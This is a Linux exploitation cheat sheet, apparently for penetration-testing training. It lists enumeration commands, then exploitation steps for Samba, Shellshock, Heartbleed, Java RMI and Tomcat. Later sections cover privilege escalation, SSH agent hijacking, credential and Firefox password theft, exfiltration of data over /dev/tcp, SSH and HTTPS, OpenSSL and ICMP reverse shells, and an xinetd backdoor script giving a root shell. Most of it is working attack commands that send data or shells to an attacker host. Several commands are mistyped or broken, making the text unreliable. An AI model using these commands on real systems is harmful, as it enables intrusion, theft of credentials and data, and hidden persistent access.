LINUX EXPLOITATION
<REMOTE ENUMERATION>
OS Fingerprinting
nmap -O --osscan-guess <IP Addreess>
nmap -v -sT -O <IP Addreess>
nmap -v -sS -sU -sV -n <IP Addreess>
NFS Protocol on port 2048
nmap -sT -sU -sV -p2049 <IP Addr>
nmap --script nfs-ls,nfs-showmount,nfs-statfs <IP Addreess>
showmount -e <IP Address>
mkdir -p /mnt/home/bob
mount -t nfs <NFS Server IP Address>:/home/bob /mnt/home/bob -o nolock
cd /mnt/home/bob && ls -la
RPCBind Protocol <Portmapper> on port 111 or 32771
nmap --script rpc-grind,rpcinfo <IP Address> -p 111 #Can be used to enumerate the portmapper and its associated services
rpcinfo -p <IP Address> #Can be used to enumerate the portmapper and its associated services
SMB Protocol <SAMBA> on port 137,138,139,445 TCP and UDP
nmap -sT -sU -sV <IP Address> -p135,137,138,139,445 --open
SMB Share Enumeration
nmap --script-smb-enum-shares <IP Address>
smbclient -L <IP Address>
smbmap -H <IP Address>
smbclient \\\\<IP Address>\\<Shared Folder>
mkdir /mnet/wwww
mount -t cifs \\\\<IP Address>\wwww /mnt/wwww
cd /mnt/www && ls -la
SMB User Enumeration
Scenario - 01: Bash for loop and rpcclient
touch users.txt
cat users.txt
for u in $(cat users.txt);
do rpcclient -U "" <IP Address> -N \
--command="lookupnames $u";
done | grep "User: 1"
rpcclient -U "" <IP Address> -N
lookupnames <user name guess>
Scenario - 02:
enum4linux <IP Address>
SMTP Protocol
telnet <IP Address> 25
nc <IP Address> 25
HELO tester.localdomain
RCPT TO root@server.localdomain
MAIL FROM tester@tester.localdomain
VRFY <user name>
EXPN <user name>
smtp-user-enum -M VRFY -U users.txt -t <IP Address>
smtp-user-enum -M EXPN -u admin -t <IP Address>
smtp-user-enum -M RCPT -U users.txt -T mail-server-ips.txt
smtp-user-enum -M EXPN -D example.com -U users.txt -t <IP Address>
DNS Protocol
ns -type=ns <domain name>
subbrute <domain name>
dnsrecon <domain name>
dig @nameserver axfr <domain name>
SNMP Protocol
<LOCAL ENUMERATION:>
Network Information
ifconfig -a
route -n
traceroute -n <IP Address>
cat /etc/resolv.conf
arp -en
arp -a <List ARP Cache>
netstat -auntp <Established and Listening TCP/UDP Port Connection>
ss -twurp <Listing active connections, process, users, bytes>
nmap -sT -p4444-4450 portquiz.net <tbound Port Connectivity>
nmap -sT -p5555 portquiz.net <Checking outbound firewall rule>
System Information
id
uname -a
grep $USER /etc/passwd
lastlog
w
for user $(cat /etc/passwd | cut -f1 -d":"); do id $user; done <All user including UID and GID>
cat /etc/passwd | cut -f1,3,4 -d":" | grep "0:0" | cut -f1 -d":" | awk '{print $1} <List all UID 0 or root account>
cat /etc/passwd
cat /etc/shadow
sudo -l <What can we sudo without a password?>
cat /etc/sudoers <Can we read the /etc/sudoers>
cat /root/.bash_history <Can we read .bash_history file?>
find /home/* -name *.*history* - print 2 > /dev/null <Can we read any other users .bash_history files?>
cat /etc/issue
cat /etc/*-release
sudo -l | grep vim
sudo -l | grep nmap
sudo -l | grep vi
ls -als /root/ <Can we list root's home directory>
echo $PATH <Current $PATH Environment Variable>
cat /etc/crontab && ls -als /etc/cron* <List all cron jobs>
find /etc/cron* -type f -perm -o+w -exec ls -l () \; <Find world writable cron jobs>
ps auxwww <List running process>
ps -u root <List all process running as a root>
ps -u $USER <List all process running as a current user>
find / -perm -4000 2 > /dev/null <Find SUID Files>
find / -uid 0 -perm -4000 -type f 2 > /dev/null <Find SUID files owned by root>
find / -perm -2000 -type -f 2 > /dev/null <Find GUID Files>
find -perm -2 -type f 2 > /dev/null <Find world-writable files>
ls -la /etc/*.conf <List all conf files /etc/ >
grep pass* /etc/*.conf <Find conf files tnat contain the string "pass">
lsof -n <List open files>
dpkg -l
sudo -V <Common Software Version>
httpd -v <Common Software Version>
apache2 -v <Common Software Version>
mysql -v <Common Software Version>
ps aux | awk '{print $11}' | xargs -r ls -la 2 > /dev/null | awk '!x[$0]++' <Print process binaries/path and permission>
find / -maxdepth 5 -name *.php -type f -exec grep -Hn password {} \; 2>/dev/null
REMOTE EXPLOITATION:
<01. Password Spray Attack> [is to reverse the process, and instead, introduce a list of as many sers as possible, while trying just a single password attempt against tens or hundreds of user accounts.]
smtp-user-enum <To enumerate users and build users.txt>
https://github.com/insidetrust/statistically-likely-usernames <To develop users.txt>
head -n 50 john.txt >> users.txt
msf> use auxiliary/scanner/smtp/smtp_enum <To confirm user validity>
nmap -sT <IP Address> --open --max-retries 1 -n
hydra -L users.txt -P password.txt ssh://<IP Address>
hydra -l david -p Spring2018 -M ssh_servers.txt ssh <To find others target of SSH Server>
<02. Exploiting Samba>
<Samba Cry Vulnerability CVE-2007-2447>
nmap --script smb-os-discovery -p445 <IP Address>
https://www.rapid7.com/db/modules/exploit/multi/samba/usermap_script <Samba Cry Vulnerability CVE-2007-2447>
https://www.samba.org/samba/security/CVE-2007-2447.html <Samba Cry Vulnerability CVE-2007-2447>
msf> use exploit/multi/samba/usermap_script
python -c 'import pty;pty.spawn("/bin/sh")'
<Samba Symlink Directory Traversal>
https://www.samba.org/samba/news/symlink_attack.html <Samba Symlink Directory Traversal>
smbmap -H <IP Address> <To find writable share folder, ” command to determine shares available to us on a Samba server>
msf>use auxiliary/admin/smb/samba_symlink_traversal <To create the symlink to the root filesystem>
smbclient \\\\<IP Address>\\<Writable Share Folder>
smb:rootfs tmp rootfs \\> cd etc
smb:rootfs tmp rootfs etc \\> tar c ../ tmp /all_files.tar
root@tester# tar xf tmp /all_files.tar
root@tester# cd tmp rootfs tmp rootfs /
root@tester# grep r "password" * 2>&1 /dev/null
<Certain situations where we have a fully patched Samba server, but have a writeable share available to us>
nmap --script smb os discovery <IP Address> -p445
smbmap -H <IP Address>
smbclient \\\\<IP Address>\\<Share Folder> -N
smb:\\> put test.pl
{#!/usr/ perl
print "Content type: text/html n n";
system("id");}
smb:\\> put perl-reverse-shell.pl <download from http://pentestmonkey.net/tools/web-shells/perl-reverse-shell>
nc -lvnp 1234
<03. Exploiting Shellshock [CVE-2014-6271] >
env x=‘() { :;}; echo vulnerable’ bash c “echo this is a test” <To identify shellshock vulnerability>
./dirsearch.py -u http://<IP Address>/ -e cgi -r <To find any CGI files>
nmap --script http-shellshock --script-args uri=/cgi-bin/login.cgi <IP Address> -p 80 <To Identify Shellshock vulnerability>
wget -U "() { foo;};echo \\"Content type: text/plain \\"; echo; echo;/bin/cat /etc/passwd" http://<IP Address>/cgi-bin/login.cgi && cat login.cgi
wget -U "() { foo;};echo; /bin/ nc <IP Address> -e /bin/ sh " http://<IP Address>/cgi bin/login.cgi <To execute reverse shell payload>
<04. Exploiting Heartbleed>
nmap --script=ssl-heartbleed <IP Address> <To identify Heartbleed vulnerability>
msf>use auxiliary/scanner/ssl/openssl_heartbleed/show actions <To dump private key>
cd ~/.msf4/loot <To change directory of the dump result>
string <file.bin> <TO read ny private key leak>
<05. Exploiting Java RMI Registry>
nmap -sT -sV <IP Address> <If "GNU Classpath grmiregistry " identified on port 1099 then Java RMI Rgistry vulnerability exist>
msf>use exploit/multi/misc/java_rmi_server <To exploit vulnerability>
python -c 'import pty;pty.spawn("/bin/sh")' <To upgrade limited shell>
<06. Exploiting Java Deserialization>
nmap -sT <IP Address>
<07. Exploiting Tomca>
nmap -sT <IP Address> <To identify tomcat manager available in the port 8180>
msf> use auxiliary/scanner/http/tomcat_mgr_login <To find valid credental to Tomcat Manager>
POST EXPLOITATION:
<01. Privilege Escalation>
System and Network Information:
Hostname
Kernel Version
Operating System
IP Address
Running Process
Network Routes
DNS Server
ARP Cache
Current Network Connection
User Information
Current User Permission
UID and GID Information for all users
Last logged on users
Root Accounts
Service accounts
Home Directories
Priviledge Access
Can the current user execute anything with elevated priviledge?
Are there any setuid root (SUID) binaries on the system which may be vulnerable to priviledge escalation?
Can we read sensitive information files that might contain sensitive information, password, etc?
Can we read the shadow files? Can we crack the hash?
Can we read or lost the contents pf the /root directory?
Can we write to directories that configured to serve web pages?
Services
Are service configuration files readable or modifiable by current user?
Can we modify the configuration of a service in such a way that gives us elevated priviledge?
Do the configuration files contain any information we can use to our advantage?
Job/Tasks
What tasks or jobs is the system configured to run and at which times?
Are there any custom jobs or tasks configured as root that word writable?
Can we modify any of the existing tasks at all?
Installed Software Version Information
What software packages are installed on the system?
What versions? Are the versions installed out of date and ulnerable to existing available exploits?
Does any of the installed software allow us to modify their onfiguration files and could this result in gaining privileged ccess to the system?
<01> Cleartext Credential in Configuration Files
https://github.com/rebootuser/LinEnum
msf> use post/linux/gather/enum_configs
msf> use post/linux/gather/enum_system
<02> SUID Binaries
find / -perm -4000 -type f 2 >/dev/null
msf> use exploit/linux/local/glibc_origin_expansion_priv_esc
nmap --interactive then type !sh
<03> SUDO Privileged Access
Definition: Sudo is used to provide privileged access to users on a temporary basis, allowing users to run commands as another user (usually root), and when that elevated access is required, a user can simply run “ sudo command ”.
sudo -l <To retrive sudoers status>
less (!sh)
more (!sh)
vi/vim (!sh)
nmap --interactive + !sh
ftp (!sh)
gdb (!sh)
man -P "id" man <To display our UID and GID>
sudo man -P "cat /etc/shadow" man
<04> Restrictied Shell
:!sh
find /home/bob -name test -exec /bin/sh
python -c 'import pty;pty.spawn("/bin/sh")'
perl -e 'exec "/bin/sh"'
<05> Cracking the shadow
unshadow passwd shadow > shadow.john
john shadow.john --wordlist=/usr/share/wordlist/custom_words.txt
swapon -s
./mimipenguin.sh
python mimipenguin.py
<06> Pilfering credential from Swap Memory
swapon -s <To Find Swap Memory File>
cat /proc/swaps
string <partition name> | grep "password="
string <partition name> | grep "&password="
<07> Code Execution via Shared Object Library Loading
a. Determine the shared objects that are being loaded by an executable.
b. Determine if the application was compiled with RPATH or RUNPATH options. If yes, can we write into the locations specified by the either of those options?
ldd /user/local/program
objdump x /usr/local/bin/program | grep RPATH
objdump x /usr/local/bin/program | grep RUNPATH
msfvenom -a x64 -p linux/x64/shell_reverse_tcp LHOST=<attacker IP> LPORT=<attacker LPORT> -f elf-so -o program.so
python -m SimpleHTTPServer 80
cd /tmp/program/libs && wget http://attacker_ip/program.so
msf> use exploit/multi/handler
<08> Kernel Exploit
uname -a
searchsploit
perl Linux_Exploit_Suggester.pl -k <kernel version>
gcc -m32 exploit.c -o exploit
<09> Unix Socket Exploitation
<02. Lateral Movement>
Lateral Movement involves moving throughout the target organization from machine to machine, server to server using
credentials we obtain through other phases, and furtherstrengthening our foothold within the target infrastructure to the ultimate objective which is defined by the customer.
<01> SSH Hijacking
ps aux | grep sshd <Find the SSHD Process ID on the victim>
grep SSH_AUTH_SOCK /proc/<pid>/environ <Looking SSH_AUTH_SOCK in environment variable at the victim>
SSH_AUTH_SOCK=/tmp/ssh-XXXXXXX/agent.XXXX ssh-add -l <Hijacking ssh-agent scoket>
ssh <IP Address> -l victim
<02> Stealing SSH Credential
Attacker side:
git clone https://github.com/mthbernardes/sshLooter.git
cd sshlooter
python -m SimpleHTTPServer
Victim Side:
curl http://<IP Address>:8000/install.sh | bash
<03> Samba Secrets to Domain Admin
/var/lib/samba/private <When a new samba user is created, the information will store in this location>
tdbdump /var/lib/samba/private/secrets.tdb <Use tdbdump to dump the information from secrets.tdb>
https://medium.com/@br4nsh/from-linux-to-ad-10efb529fae9 <Step by step instruction>
https://github.com/byt3bl33d3r/pth-toolkit <pth-smbclient is a tool for pass the hash to the Active Directory>
<04> VPNPivot
Attacker Side
Victim Side
<05> Dumping Stored Firefox Credential
git clone https://github.com/unode/firefox_decrypt/blob/master/firefox_decrypt.py
cd firefox_decrypt
python -m SimpleHTTPServer
curl http://<IP Address>:8000/firefox_decrypt.py
python firefox_decrypt.py
Note: This tool will only work if the Master Password has not been set.
<03. Data Exfiltration>
<01> Exfil over TCP Socket with EBCDIC and Base64
nc -nlvp 80 > datafolder.tmp <Step-01: Setup attacker machine to recive the stolen data>
tar zcf - /tmp/datafolder | base64 | dd conv=ebcdic > /dev/tcp/<IP Address>/80 <Step-02: compress, encode with base64 and ebcdic and redirect to the attacker machine>
dd=conv=ascii if=datafolder.tmp | base64 -d > datafolder.tar <Step-03: decode ebcdic to ascii, decode to base64 and redirect the output to the destination folder>
tar xf datafolder.tar <Step-04: decompress the result>
<02> Exfil over SSH
tar zcf - /tmp/datafolder | ssh root@<IP Address>"cd /tmp;tar zxpf -"
<03> Exfil via POST Request over HTTPS
<?php file_put_contents('/tmp/datafolder.base64', file_get_contents('php://input')); ?> <Step-01: Setup file at the attacker that receive the stolen data>
curl --data "$(tar zcf - /tmp/datafolder | base64)" https://<IP Address>/contact.php <Step-02: compress and encode, then sending with POST method with curl>
cat /tmp/datafolder.base64 | base64 -d > datafolder.tar && tar xf datafolder.tar <Step-03L decode and decompress and redirecting to the destination folder>
<04. Maintaining Access and Persistence>
<01> Reverse Shell for Maintaining Access
<Openssl Reverse Shell>
#At The Attacker Side:
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes <Step-01: To generate an SSL Certificate key pair>
openssl s_server -quiet -key key.pem -cert cert.pem -port 443 <Step-02: To listen at the SSL Port or 443>
#At The Victim Side:
mkfifo /tmp/x; /bin/sh -i < /tmp/x 2>&1 | openssl s_client -quiet -connect <IP Address>:443 > /tmp/x; rm /tmp/x <Step-03: To Connect back to Attacker machine>
<ICMP Reverse Shell>
#At the Attacker Side (Master):
git clone https://github.com/inquisb/icmpsh
cd icmpsh
sysctl -w net.ipv4.icmp_echo_ignore_all=1sysctl
./icmpsh_m.py <Attacker IP Address> <Victim IP Address>
C:\User\Attacker>
#At Victim Side (Slave):
icmpsh.exe -t <Attacker IP Address> -d 500 -b 30 -s 128
<02> Custom Service for Persistance
<Xinetd UDP Portknock Backdoor>
<Step-01:> To create custom xinetd backdoor on the target with the following shell script:
#!/bin/bash
cp /bin/nc /bin/services-udp
echo "service services-udp" >/etc/xinetd.d/services-udp
echo "{" >> /etc/xinetd.d/services-udp
echo " server = /bin/services-udp" >> /etc/xinetd.d/services-udp
echo " server_args = <attacker_IP> <attacker_PORT> -e /bin/bash" >> /etc/xinetd.d/services-udp
echo " protocol = udp" >> /etc/xinetd.d/services-udp
echo " user = root" >> /etc/xinetd.d/services-udp
echo " socket_type = dgram" >> /etc/xinetd.d/services-udp
echo " wait = yes" >> /etc/xinetd.d/services-udp
echo " flags = IPv4" >> /etc/xinetd.d/services-udp
echo "}" >> /etc/xinetd.d/services-udp
echo "services-udp 65534/udp # services-udp" >> /etc/services
/etc/init.d/xinetd stop
/etc/init.d/xinetd start
<Step-02:> Setup a netcat listener in the same port like in the script
nc -lvnp 4444
<Step-03:> Geberate single UDP Packet then send to the victim machine
hping3 -2 -c 1 <Victim IP Address> -p 65534
Py-Sec[dot]org 